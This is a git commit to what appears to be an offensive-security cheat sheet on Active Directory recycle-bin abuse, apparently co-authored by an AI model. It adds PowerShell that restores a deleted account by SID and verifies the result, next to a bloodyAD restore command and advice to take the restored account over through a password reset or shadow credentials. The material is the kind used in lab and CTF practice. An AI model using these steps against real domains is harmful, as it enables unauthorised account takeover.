commit f2b790878056e40e0c034518a748f2b7f2b5f9b6
parent 6e2600541b6cc993eb2ae7fe244363b1f21c4bc5
Author: DAEMON <zer0sec.xp@icloud.com>
Date: Sun, 20 Sep 2026 04:01:19 +0100
recycle-bin: add SID-filtered Restore-ADObject and Get-ADUser verify
Native restore now shows the SID-filter form piping straight to Restore-ADObject, plus a Get-ADUser check that the object returned enabled under its OU. Matches the TombWatcher writeup recording.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Diffstat:
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/src/content/sheets/active-directory/ad-recycle-bin-enumeration.md b/src/content/sheets/active-directory/ad-recycle-bin-enumeration.md
@@ -108,8 +108,13 @@ bloodyAD -u "$U" -d "$DOMAIN" -p "$P" --host "$DC" set restore 'S-1-5-21-…-111
```
```powershell
-# Windows — restore by deleted-object DN (from Get-ADObject -IncludeDeletedObjects)
+# Windows — restore natively. Easiest: filter the bin by the SID that owns the
+# edge and pipe straight to Restore-ADObject (no need to copy the mangled DN):
+Get-ADObject -Filter "objectSid -eq 'S-1-5-21-…-1111'" -IncludeDeletedObjects | Restore-ADObject
+# or restore by the deleted-object DN (from Get-ADObject -IncludeDeletedObjects):
Restore-ADObject -Identity '<distinguishedName-with-\0ADEL:GUID>'
+# confirm it came back, enabled, under its old OU:
+Get-ADUser -Identity <restored> | Select-Object SamAccountName,Enabled,DistinguishedName
```
If you control the restored object (e.g. `GenericAll` over its OU covers restored children too), take it over — reset the password or add shadow credentials: